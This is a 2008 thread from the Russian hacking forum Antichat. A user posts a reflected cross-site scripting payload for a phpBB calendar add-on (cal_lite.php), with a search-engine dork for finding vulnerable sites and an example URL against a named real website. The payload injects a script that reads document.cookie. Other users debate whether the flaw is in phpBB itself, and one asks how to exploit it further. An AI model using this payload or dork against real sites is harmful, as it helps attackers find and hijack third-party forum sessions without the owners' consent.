ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

xss в модуле cal_lite.php \PhpBB\
  #1  
Старый 15.03.2008, 22:22
Аватар для ReVOLVeR
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию xss в модуле cal_lite.php \PhpBB\

inurl:cal_lite.php

cal_lite.php?id=12&mode=display&cl_d=%3Cscript%3Ea lert(document.cookie)%3C/script%3E&cl_m=11&cl_y=2007

Последний раз редактировалось ReVOLVeR; 15.03.2008 в 22:43..
 
Ответить с цитированием

  #2  
Старый 15.03.2008, 22:24
Аватар для a1ex
a1ex
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406

Репутация: 271


Отправить сообщение для a1ex с помощью ICQ Отправить сообщение для a1ex с помощью AIM Отправить сообщение для a1ex с помощью MSN Отправить сообщение для a1ex с помощью Yahoo
По умолчанию

Сейчас потестим....
 
Ответить с цитированием

  #3  
Старый 15.03.2008, 22:26
Аватар для ReVOLVeR
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

к примеру
_http://www.airsoftgun.ru/phpBB/cal_lite.php??id=12&mode=display&cl_d=%3Cscript%3E alert(document.cookie)%3C/script%3E&cl_m=11&cl_y=2007
 
Ответить с цитированием

  #4  
Старый 15.03.2008, 22:27
Аватар для a1ex
a1ex
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406

Репутация: 271


Отправить сообщение для a1ex с помощью ICQ Отправить сообщение для a1ex с помощью AIM Отправить сообщение для a1ex с помощью MSN Отправить сообщение для a1ex с помощью Yahoo
По умолчанию

Не на всех работает.
 
Ответить с цитированием

  #5  
Старый 15.03.2008, 22:31
Аватар для Zedobat
Zedobat
Участник форума
Регистрация: 24.07.2007
Сообщений: 175
Провел на форуме:
1092179

Репутация: 102
По умолчанию

Название темы не отвечает содержимому.

XSS не в phpbb а в модуле который использует этот cal_lite.php, тк на большинстве форумах его нету.
 
Ответить с цитированием

  #6  
Старый 15.03.2008, 22:33
Аватар для ReVOLVeR
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

Zedobat модуль чего модуль форума phpbb + разводиш флэйм в теме на это есть болталка..
 
Ответить с цитированием

  #7  
Старый 15.03.2008, 22:36
Аватар для a1ex
a1ex
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406

Репутация: 271


Отправить сообщение для a1ex с помощью ICQ Отправить сообщение для a1ex с помощью AIM Отправить сообщение для a1ex с помощью MSN Отправить сообщение для a1ex с помощью Yahoo
По умолчанию

ТС каким образом можно дальше юзать xss.
Распиши пожалуйста.Обьясни.
 
Ответить с цитированием

  #8  
Старый 15.03.2008, 22:38
Аватар для fucker"ok
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию

Такого файла нет ни в phpbb 2.x ни в 3.x.
 
Ответить с цитированием

  #9  
Старый 15.03.2008, 22:38
Аватар для ReVOLVeR
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

fucker"ok это модуль...
 
Ответить с цитированием

  #10  
Старый 15.03.2008, 22:39
Аватар для Zedobat
Zedobat
Участник форума
Регистрация: 24.07.2007
Сообщений: 175
Провел на форуме:
1092179

Репутация: 102
По умолчанию

Цитата:
xss in phpBB all version
inurl:cal_lite.php - Результаты 1 - 10 из примерно 9 580
powered by phpbb - Результаты 1 - 10 из примерно 9 890 000

И где же "in phpBB all version" ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit TANZWUT Форумы 4 10.06.2008 20:18
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Форумы 6 26.10.2006 21:30
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ